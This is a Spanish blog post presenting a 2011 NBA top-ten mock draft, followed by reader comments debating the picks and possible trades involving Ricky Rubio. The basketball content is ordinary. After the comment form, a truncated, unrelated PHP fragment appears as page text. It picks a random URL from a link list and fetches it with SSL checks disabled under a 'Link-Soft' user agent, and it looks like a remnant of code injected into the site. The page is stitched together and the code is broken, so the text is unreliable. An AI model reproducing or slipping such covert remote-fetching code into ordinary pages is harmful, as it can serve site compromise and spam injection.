Mock Draft 1.0 (Top Ten)

19 de May de 2011 por Viva_Dirk

Ayer os informábamos via twitter que los Cavs se habían hecho con el número 1 del draft gracias a la elección que los Clippers les traspasaron junto a Baron Davis. Hoy, y una vez conocemos el orden del draft, vamos a lanzarnos con nuestro primer mock que llega con muchas cosas en el aire. Tantas que es posible que el mock cambie mucho en sucesivas versiones, más aún si alguno de los europeos se retira, como creo que podría ser el caso de Valanciunas. Este debería ser un draft donde los traspasos fueran la nota dominante aunque por lo visto en ediciones no tenemos demasiadas esperanzas en que las franquicias se vuelvan locas a la hora de intercambiar sus elecciones. Dicho esto, vamos al lío:

Nº1 Kyrie Irving – Cleveland Cavaliers

Es un base de estilo propio. Por tamaño puede asemejarse a Deron Williams o Derrick Rose, aunque no podemos decir que posea un físico impresionante y no es nada habitual verle jugar por encima del aro. Por juego se trata de un playmaker clásico, con un gran manejo del balón y control del juego, ambidiestro cuando se trata de botar o pasar. A esto hay que unirle una gran muñeca desde cualquier punto del campo como dejan claro su 90% en tiros libres y 46% en tiros de 3. En defensa se trata de un buen ladrón que sufrirá físicamente al principio de su andadura en la NBA. Sin duda es la estrella de este draft, así que los Cavs deberían ir pensando que hacer con Baron Davis.

Nº2 Derrick Williams – Minnessotta Timberwolves

Los Wolves se encuentran con un papelón en este Nº2. Derrick Williams es sin duda lo mejor disponible pero se trata de un ala-pívot muy anotador, puesto más que cubierto en su rotación. Aun así puede formar un jovencísimo e interesantísimo juego interior con Love, Randolph y Beasley, aunque este último pueda jugar de alero. Williams es un jugador eminentemente ofensivo, anotador en el poste y buen tiro desde posiciones exteriores. No destaca por su físico lo cual es algo que tendrá que mejorar nada más pisar la liga, tanto para poder jugar cerca del aro en ataque como para no ser machacado en defensa.

Nº3 Jan Vesely – Utah Jazz

Con el juego interior absolutamente cubierto y Devin Harris en el puesto de base los Jazz deben preocuparse de cubrir las alas, así que Vesely parece lo más adecuado a sus necesidades. Las cualidades de Vesely son de sobra conocidas para los Jazz ya que muchos le comparan con el ruso Andrei Kirilenko, si bien el checo es un jugador más ‘caliente’ que el ruso. Sus excesivos problemas para anotar desde la media y larga distancia pueden tentar a alguno de colocarlo como ala-pívot pero donde puede ser realmente diferencias en la liga es jugando de alero y haciendo destacar sus virtudes sobre sus defectos.

Nº4 Enes Kanter – Cleveland Cavaliers

Una vez elegido Irving los Cavs deberían buscar algo más para el juego exterior pero la total ausencia de escoltas y aleros de gran nivel en este draft les hará volver la cabeza hacia Europa donde varios jugadores interiores llaman a las puertas de la NBA. Enes Kanter es un absoluto misterio a día de hoy. Se conocen sus cualidades y su enorme potencial, pero no ha jugado este año y no es fácil que alguien pase de no jugar ninguna competición a dar el salto a la mejor de todas. Los Cavs tendrán tiempo de ir preparándole durante los próximos años.

Nº5 Bismack Biyombo – Toronto Raptors

Otro caso más en el que la elección de un escolta sería lo ideal. Los Raptors tendrán que conformarse con lo que hay y lo más acorde a sus necesidades es el congoleño Biyombo que puede resultar un excelente complemento para Bargnani y Ed Davis. A sus 18 años sus cualidades ofensivas son casi nulas pero sus posibilidades defensivas parecen casi infinitas. El caso Ibaka nos deja claro que un jugador con un tremendo físico como casi única arma puede hacerse un hueco importante en la liga a base de trabajo y dedicación.

Nº6 Alec Burks – Washington Wizards

Llegados a este punto no podemos evitar decantarnos por la necesitadad pura y dura. Wall, McGee y Blatche ocupan los puestos que más ofrece este draft así que Burks podría verse favorecido por esta circunstancia. El jugador de segundo año de Colorado es un escolta puro que se mueve más por la zona que tras la línea de 3 y que destaca por mostrar una gran inteligencia sobre la pista. No suele complicarse y es aplicado en defensa. Un jugador de equipo al que no le falta talento.

Nº7 Brandon Knight – Sacramento Kings

El líder de Kentucky está preparado para rendir desde el minuto 1 y de ser escogido por los Kings lo haría en un escenario muy favorable. Tendrá que demostrar todo su talento para quitarle la titularidad al esloveno Beno Udrih y eso es algo que, con el carácter de Knight, hará de los Kings un equipo mejor. Sin duda es un base de los que no abundan, con dotes de mando y capacidad anotadora pero con graves problemas para mantener la posesión del balón. Mejorar la toma de decisiones haría de él un jugador con posibilidades de ser All-Star.

Nº8 Donatas Motiejunas – Detroit Pistons

Con Greg Monroe y Rodney Stuckey como piezas principales del proyecto, el lituano Motiejunas es una gran posibilidad para los Pistons. Con 2.16 es un jugador que puede acompañar muy bien a Monroe en la pintura, con un buen tiro desde media distancia y una buena capacidad anotadora al poste. Y todavía acumula más virtudes por puro físico.

Nº9 Kemba Walker – Charlotte Bobcats

Sin duda el gran perjudicado por la composición del draft y los equipos poseedores de los picks. Podría ser elegido más arriba con un traspaso que le abra hueco, pero la inmobilidad que suele dominar este evento puede hacerle bajar incluso más posiciones ya que aunque los Bobcats no tienen a nadie intocable, DJ Augustin debe ser de los mas valorados por la franquicia. Las virtudes de Walker son de sobra conocidas, es un base anotador al más puro estilo neoyorkino, una bomba en ataque y una buena experiencia tras 3 años en la universidad. Un jugadorazo.

Nº10 Marcus Morris – Milwaukee Bucks

Sería un buen premio para una carrera universitaria brillante entrar en el top10, algo a lo que no podría aspirar si no fuera por la retirada de varios nombres ilustres. Morris es un ala-pívot muy completo, elegante a la vez que luchador, con tiro exterior y actitud para el rebote, muy versátil y preparado para jugar un buen número de minutos y hacerlo bien. Eso sí, salvo sorpresa grande su techo está cercano.

Comenta

22 comentarios a esta entrada

  1. Denise dice:
    #1

    Gracias por la info por que no conozco mucho de estos chicos.
    He estado leyendo algunas opiniones de gente especializada y suelen coincidir en que este próximo draft no es precisamente de lo mejorcito, vamos que es uno de los peores de los últimos años. Espero que se equivoquen por el bien del basket.

      Citar

  2. ralage dice:
    #2

    Muchas gracias por el análisis, justo despues del sorteo , estaba deseando empezar a conocer a quién tienen pinta de elegir las franquicias

      Citar

  3. Ru dice:
    #3

    Pues porque Baron es sospechoso,que viendo como ha quedado el draft order traspasaría a Baron por la elección nº 2 de los Wolves,juntando los Cavs a un Irving-Derrick Williams-Kanter para ir creciendo,mientras que en los T’Wolves,sobrados de jugadores interiores conseguirían un buen base,más si tenemos en cuenta que el PG titular es Ridnour,el bajonazo de Flynn y la incógnita Ricky.

    No soy muy optimista con este draft Denise y no creo que se equivoquen mucho los expertos…lo bueno pal 2012

      Citar

  4. portu dice:
    #4

    Da la sensación q en este draft las piezas no acaban de encajar en función de las necesidades de los equipos, aparte de lo q ya se ha comentado de la falta de calidad en general… eso puede hacer q caigan tíos como B. Knight o Kemba Walker, frente a jugadores como Vesely, con limitaciones conocidas como la falta de un tiro consistente. Tb veremos cómo afecta el lockout…
    Como dice Viva, el papelón es para Minesota, pero si yo fuera su GM ofrecía a Ricky+Beasley+pick2 por K. Irving, el jugador q realmente necesitan.

      Citar

  5. Viva_Dirk dice:
    #5

    Joder Portu, si das todo eso como mínimo tendrás que ir a por Derrick Rose!!! Ricky va a ser un excelente base, una vez metido en el ritmo NBA estoy seguro de que va a ser una estrella.

      Citar

  6. Txusma dice:
    #6

    Yo tb creo que lo q han de hacer los Wolves es apostar por Ricky siempre que el del Masnou demuestre su madurez y deje de marear la perdiz de una vez. Un Ricky con confianza está al nivel de Irving segurísimo. Hablamos de un chaval q ha jugado finales de JJOO, Europeos, Final Fours, Playoffs ACB… Además si vendes el pick número 2 es pq tienes a Beasley. No parece mucho sentido enviarlos juntos a no ser que se apueste definitivamente por Anthony Randolph. Si empaquetas a Beasley + num 2 hay q ir a por un escolta y no de los malos…

    Hablando del mock a mi me da que Vesely caerá más y que el primer europeo que saldrá si es que no se retira será Valanciunas, del que están bastante enamorados. Creo que saldrá a la altura de Biyombo. Burks tb creo que no saldrá del TOP-10 a pesar del ser el único escolta decente del draft y me da que los bases Knight y Walker subirán aunque no cubran carencias concretas de los equipos. Son de lo mejor del draft. q caigan tanto es un delito.

      Citar

  7. TX dice:
    #7

    Creo que a Utah le vendría bien coger a Brandon Knight ya que Harris tiene ya sus 28 añitos y traspasar a este y alguien más a cambio de un escolta más anotador que Miles. No tiene mala pinta mal el proyecto: Knight, ¿?, Hayward, Millsap, Favors

      Citar

  8. Txusma dice:
    #8

    Y te has olvidado de al Jefferson. A Favors le quedan un par de años más. En este tiempo que aprenda de Millsap y Jefferson.

      Citar

  9. TX dice:
    #9

    Es verdad, creía que era más viejo

      Citar

  10. Loon dice:
    #10

    Yo también creo que Vesely caerá unos puestos. Aunque sea un buen jugador.

    Veo algún traspaso sonado en Minnesota, no estoy seguro de que sea la ciudad de Ricky (por mercado i tradición de baloncesto) ni de que ellos utilicen la elección Nº2.

    Lo de Sacramento no lo veo claro. Ayer el Sacramento Bee apostaba por atlético defensor Kawhi Leonard. Pero con el no estaría saturado el puesto de PG?

      Citar

  11. Viva_Dirk dice:
    #11

    Leonard es un 3-4, no seria mala opción para Sacramento si los buenos estuvieran cogidos.

    Y yo repito, que para traspasar a Ricky+Nº2 deberia llegar a los Wolves algo muy bueno y que además tuviera un coste salarial bajo.

      Citar

  12. portu dice:
    #12

    Qué batacazo se van a dar algunos con Ricky… peor q el q se dieron con Sergo Rodríguez, je,je

      Citar

  13. Txusma dice:
    #13

    Leo rumores de un posible traspaso a Indiana. Sería algo así como Ricky/Beasley + num2 x Danny Granger. Entiendo q sería para coger a Derrick Williams q por cierto no hace más q repetir que él es un 3.

      Citar

  14. Loon dice:
    #14

    Estoy contigo Viva_Dirk, Ricky+Nº 2 no es un traspaso, es el gordo de Navidad. Pero veo en Indiana un buen sitio para Ricky, eso si, los acuerdos intercanvios ya no los tengo tan claros.

      Citar

  15. HisRoyalAirness dice:
    #15

    Portu, yo creo que al contrario, el ritmo de la NBA me parece que va a beneficiar a Ricky y su velocidad y va a contar con más minutos seguidos en pista de los que permite la larga rotación del Barça.
    Y tiene años y años para mejorar, que parece que nos olvidamos de que es un crío

      Citar

  16. portu dice:
    #16

    No, yo no digo q Ricky no pueda jugar en la NBA o hacer un papel digno, simplemente no le veo como estrella de una franquicia. Tiene muchos defectos, algunos de ellos desde los 17 y sigue sin pulirlos, pero para mi su principal problema será el físico. Es incapaz de dejar una bandeja cerca del aro, eso no mejora con los años, no tiene salto y ya está… en cuando vean allí como tira y empiecen a flotarle como hacen con Rondo qué podrá hacer Ricky? Rondo al menos entra a canasta y saca ventaja de ahí para buscar buenos pases, pero Ricky, más allá del contraataque qué puede aportar?

      Citar

  17. Viva_Dirk dice:
    #17

    Ricky es un gran base de contraataque como dices, pero no creo que cuentes demasiados bases mejores que el para jugar en estático, tiene velocidad suficiente para revasar a su par y doblar balones pero además es un buen organizador del juego sin la necesidad del uno contra uno. Físicamente mejorará cuando llegue a la liga y su tiro exterior es mejor que el de algunos bases ilustres del momento, algo que desde luego tambien puede mejorar.

    Eso si, en mi opinión esta tardando ya en dar el salto.

      Citar

  18. Viva_Dirk dice:
    #18

    Y se me olvidaba, es un defensor excepcional, tanto sobre el balón como en ayudas.

      Citar

  19. JHC dice:
    #19

    De salir Jonas Valanciunas arriba iri a la NBA o se quedaria en Euopa como Ricky? veo que por aqui no lo poneis en el top 10 en otros lados los pone incluso en top 5

      Citar

  20. Txusma dice:
    #20

    Este mock es una primera valoración personal de Viva_Dirk. En las siguientes ediciones ya tendremos en cuenta los rumores que corren, los workouts que vayan realizando los jugdores, etc… Valanciunas anda tb un poco escondido. Como dice Viva_Dirk, veremos si acaba presentándose.

      Citar

  21. Loon dice:
    #21

    Donde veis a Jimmer Fredette? Phoenix? Utah?

      Citar

  22. Txusma dice:
    #22

    O incluso un poco más abajo. Todo dependerá de como le vayan los Workouts. Si ha de jugar de base tendrá que demostrar que puede hacer algo más que anotar.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>